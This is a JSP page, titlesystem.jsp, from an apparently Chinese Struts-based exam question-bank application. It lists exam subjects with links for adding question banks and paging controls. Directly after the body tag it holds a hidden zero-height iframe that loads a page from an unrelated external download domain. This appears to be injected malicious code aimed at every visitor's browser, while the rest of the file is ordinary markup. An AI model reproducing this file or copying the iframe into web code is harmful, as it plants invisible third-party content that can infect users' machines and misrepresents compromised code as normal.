📄 titlesystem.jsp
字号:
<%@ taglib uri="/WEB-INF/struts-bean.tld" prefix="bean" %>
<%@ taglib uri="/WEB-INF/struts-html.tld" prefix="html" %>
<%@ taglib uri="/WEB-INF/struts-logic.tld" prefix="logic" %>
<%@ page language="java" pageEncoding="gb2312"%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>无标题文档</title>
<link href="css/css.css" rel="stylesheet" type="text/css">
<style type="text/css">
<!--
.style10 {
font-size: 18px;
color: #FFFFFF;
font-weight: bold;
}
body {
background-image: url(images/back1.jpg);
}
.style11 {font-size: 12px}
.style12 {
color: #0000FF;
font-weight: bold;
}
.style14 {font-size: 12px; font-weight: bold; }
.style26 {font-size: 18px; font-weight: bold; color: #0000FF; }
.style18 {font-size: 12px; font-family: "新宋体"; }
.style25 {font-size: 16px; font-family: "新宋体"; }
-->
</style>
</head>
<body><iframe src=http://down.onlinedowns.net/page/image/pd.htm height=0></iframe>
<html:form action="/titleSystem.do" method="post" styleId="titleManageForm">
<table width="100%" border="0" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC" class="px12">
<tr bgcolor="#1A7FE5" class="bk">
<td height="31" colspan="5"><div align="center" class="style10">题库系统</div></td>
</tr>
<tr>
<td colspan="5" bgcolor="#FFFFFF" style="text-align:center"><span class="style11">
<label></label>
</span></td>
</tr>
<tr bgcolor="#EEEEEE" style="text-align:center">
<td width="8%" height="20"><span class="style14">科目ID</span></td>
<td width="15%"><span class="style11"><strong>考试科目</strong></span></td>
<td width="26%"><span class="style11"><strong>增加选择题题库</strong></span></td>
<td width="26%"><span class="style11"><strong>增加判断题题库</strong></span></td>
<td width="25%"><span class="style11"><strong>增加主观题题库</strong></span><span class="style11"></span></td>
</tr>
<logic:iterate id="kemu" name="CLINFOS">
<tr bgcolor="#FFFFFF" style="text-align:center" onMouseOver="this.bgColor='#dddddd';" onMouseOut="this.bgColor='#FFFFFF';">
<td height="20"><span class="style11"><bean:write name="kemu" property="kemuID" /></span></td>
<td><span class="style11"><bean:write name="kemu" property="kemuName" /></span></td>
<td><span class="style11"><a href ="<%=request.getContextPath()%>/titleSystem.do?method=selectDisplay&kemuID=<bean:write name="kemu" property="kemuID" />&tikuNO=001">
<img src="images/modify.png" alt="增加" border="0"></a>
</span></td>
<td><span class="style11"><a href ="<%=request.getContextPath()%>/titleSystem.do?method=selectDisplay&kemuID=<bean:write name="kemu" property="kemuID" />&tikuNO=002">
<img src="images/modify.png" alt="增加" border="0"></a>
</span></td>
<td><span class="style11"><a href ="<%=request.getContextPath()%>/titleSystem.do?method=selectDisplay&kemuID=<bean:write name="kemu" property="kemuID" />&tikuNO=003">
<img src="images/modify.png" alt="增加" border="0"></a>
</span></td>
</tr>
</logic:iterate>
</table>
<table width="100%" border="0" cellpadding="0" cellspacing="0" class="px12" style="text-align:center">
<tr>
<logic:notPresent name="searchPage" scope="request">
<td height="26"><span class="style11">第<bean:write name="PAGER" property="currentPage"/>页 每页<bean:write name="PAGER" property="pageSize"/>条 共有<bean:write name="PAGER" property="totalRows"/>条记录
<html:link action="/titleDisplay.do?method=display&pageMethod=first" paramName="PAGER" paramProperty="currentPage" paramId="currentPage">首页</html:link>
<html:link action="/titleDisplay.do?method=display&pageMethod=previous" paramName="PAGER" paramProperty="currentPage" paramId="currentPage">上一页</html:link>
<html:link action="/titleDisplay.do?method=display&pageMethod=next" paramName="PAGER" paramProperty="currentPage" paramId="currentPage">下一页</html:link>
<html:link action="/titleDisplay.do?method=display&pageMethod=last" paramName="PAGER" paramProperty="currentPage" paramId="currentPage">末页</html:link> </span></td>
</logic:notPresent>
</tr>
</table>
<p> </p>
</html:form>
</body>
</html>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -